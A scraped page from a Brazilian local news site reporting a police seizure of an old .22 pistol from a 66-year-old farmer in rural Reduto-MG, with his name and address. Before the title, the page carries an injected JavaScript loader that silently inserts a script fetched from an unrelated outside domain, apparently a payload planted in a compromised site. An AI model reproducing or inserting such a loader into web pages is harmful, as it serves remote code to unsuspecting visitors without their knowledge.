;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Arma de Fogo apreendida em Reduto. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Arma de Fogo apreendida em Reduto.

Garrucha 22 aEm averiguação de denúncia, deslocamos até a residência do conhecido sr. Manoel, situado no Córrego Arrozal, zona rural de Reduto-MG.
No povoado, encontramos com o mesmo trabalhando em sua lavoura e, em parlamentação com o mesmo, este confirmou possuir uma arma de fogo em casa, que adquiriu há cerca de 30 anos, da qual afirmou, não ter mais nenhuma utilidade para sua pessoa.
Dialogamos com o sr. Manoel, explicitando ao mesmo, os riscos de se ter uma arma de fogo em casa (acidentes, risco de atrair ladrões que queiram a arma), no sentido de que ele realizasse a entrega da arma a nossa equipe PM, o qual imediatamente atendeu.
Divulgamos os telefones de contato com a PM de Reduto, caso note a presença de indivíduos/veículos suspeitos nas imediações.
O Delegado de Plantão, Dr. Getúlio Lacerda o autuou em flagrante tendo arbitrado no mínimo que ele poderia, sendo no valor de um terço do salário mínimo, valor o qual, sr. Manoel pagou prontamente sendo liberado em seguida.
Autor preso:
Manoel Raimundo da Silva, 66 anos, lavrador, casado, residente no Córrego do Arrozal, s/nº, Zona Rural,
Arma de Fogo apreendida:
Garrucha marca Rossi, calibre .22, capacidade de carga de munição: 2, número de série: B48370.
Material apreendido:
Duas munições calibre .22 intactas.
Informação e foto: Felipe Duarte

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.